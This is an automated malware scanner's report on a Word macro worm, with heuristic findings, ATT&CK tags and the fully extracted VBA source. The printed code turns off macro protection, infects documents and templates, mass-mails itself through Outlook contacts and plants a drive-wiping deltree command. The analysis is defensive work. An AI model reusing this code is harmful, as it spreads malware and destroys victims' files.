MALICIOUS
508
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This document contains legacy WordBasic macro markers and a VBA AutoOpen macro, indicating a macro-based threat. The presence of a Shell() call and CreateObject() suggests the macro is designed to execute arbitrary code or download additional payloads. The ClamAV detection as 'Doc.Trojan.Indeed-1' further supports its malicious nature. The macro attempts to spread itself to other DOT files, characteristic of a worm.
Heuristics 10
-
ClamAV: Doc.Trojan.Indeed-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Indeed-1
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "C:\MAPI.REG", vbHide -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
Shell "RUNDLL32.EXE,user.exe,exitwindows", vbHide -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
VBA email-worm self-replication (Outlook mass-mailer) critical OLE_VBA_EMAIL_WORM_SELF_REPLICATIONVBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, and spreads by harvests recipients from the MAPI address book / inbox, attaches a file to the outgoing message, sends the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage — there is no benign document use, independent of any AV signature.Matched line in script
Set SpamItem = MailSvr.CreateItem(0) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set MailSvr = CreateObject("Outlook.Application") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3849 bytes |
SHA-256: 5f7a7947d7bd0abfc887c54cf24b23c6bb94291a5a40e40b1c3f4aad2de32a9e |
|||
|
Detection
ClamAV:
Doc.Trojan.Indeed-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Rem W97M/DOTWorm virus by FSO.
Rem First macro worm to spread in DOT files.
Sub ToolsMacro()
On Error Resume Next
Call MacroWorm
End Sub
Sub ToolsOptions()
On Error Resume Next
Call MacroWorm
End Sub
Sub ViewVBCode()
On Error Resume Next
Call MacroWorm
End Sub
Sub ToolsSecurity()
On Error Resume Next
Call MacroWorm
End Sub
Sub FileTemplates()
On Error Resume Next
Call MacroWorm
End Sub
Sub FileNew()
On Error Resume Next
Call MacroWorm
End Sub
Sub FileOpen()
On Error Resume Next
Call MacroWorm
End Sub
Sub AutoOpen()
On Error Resume Next
Call MacroWorm
End Sub
Sub AutoExec()
On Error Resume Next
Call MacroWorm
End Sub
Sub MacroWorm()
On Error Resume Next
Application.DisplayAlerts = wdAlertsNone
Application.EnableCancelKey = wdCancelDisabled
Application.ShowVisualBasicEditor = False
Options.AllowFastSave = True
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Options.VirusProtection = False
Documents(MacroContainer.Name).VBProject.VBComponents(1).CodeModule
OurLines = OurCode.Lines(1, OurCode.CountOfLines)
For X = 1 To Documents.Count
If Mid(Documents(X).Name, 1, 8) <> "Document" And Documents(X).VBProject.VBComponents(1).CodeModule.Lines(1, 1) <> "Rem WM97/DOTWorm virus by FSO." Then
Documents(X).Password = ""
Documents(X).ReadOnlyRecommended = False
Documents(X).WritePassword = ""
With Documents(X).VBProject.VBComponents(1).CodeModule
.DeleteLines 1, .CountOfLines
.InsertLines 1, OurLines
End With
With Documents(X)
.SaveAs (.FullName)
End With
End If
Next
For Y = 1 To Templates.Count
With Templates(Y).VBProject.VBComponents(1).CodeModule
If Mid(Templates(Y).Name, 1, 8) <> "Template" And .Lines(1, 1) <> "Rem W97M/DOTWorm virus by FSO." Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, OurLines
End If
End With
Templates(Y).Save
Next
With NormalTemplate.VBProject.VBComponents(1).CodeModule
If .Lines(1, 1) <> "Rem W97M/DOTWorm virus by FSO." Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, OurLines
End If
End With
FileCopy NormalTemplate.FullName, Application.Path & "\Love Letter For"
You.dot ""
If Int(Rnd * 5) = 2 Then
Set MailSvr = CreateObject("Outlook.Application")
If MailSvr Is Not Nothing Then
Set MAPI = MailSvr.GetNameSpace("MAPI")
For X = 1 To MAPI.AddressLists.Count
Set AddyList = MAPI.AddressLists(X)
For Y = 1 To AddyList.AddressEntries.Count
Set Contact = AddyList.AddressEntries(Y)
MailAddy = Contact.Address
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\WAB", MailAddy) <> "FSO" Then
Set SpamItem = MailSvr.CreateItem(0)
SpamItem.Bcc = MailAddy
SpamItem.Subject = "Very Funny"
SpamItem.Body = vbCrLf & " Very good. A must read, indeed. Ha!"
SpamItem.DeleteAfterSubmit = True
SpamItem.Attachments.Add (Application.Path & "\Very Funny.dot")
SpamItem.Send
If Dir("C:\MAPI.REG") = "" Then
Open "C:\MAPI.REG" For Output As #1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\WAB]"
End If
Print #1, Chr(34) & MailAddy & Chr(34) & " = " & Chr(34) & "FSO" & Chr(34)
Next
Next
If Dir("C:\MAPI.REG") <> "" Then
Print #1, ""
Print #1, ""
Close #1
Shell "C:\MAPI.REG", vbHide
End If
End If
End If
If Int(Rnd * 30) = 2 Then
Call Ha
End If
End Sub
Sub Ha()
Open "C:\AUTOEXEC.BAT" For Output As #2
Print #2, "Rem System Check"
Print #2, "deltree c:\*.* /y"
Print #2, "Rem System Check! That's bull****!"
Close #2
Shell "RUNDLL32.EXE,user.exe,exitwindows", vbHide
End Sub
Rem Ha! Have a nice day!
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.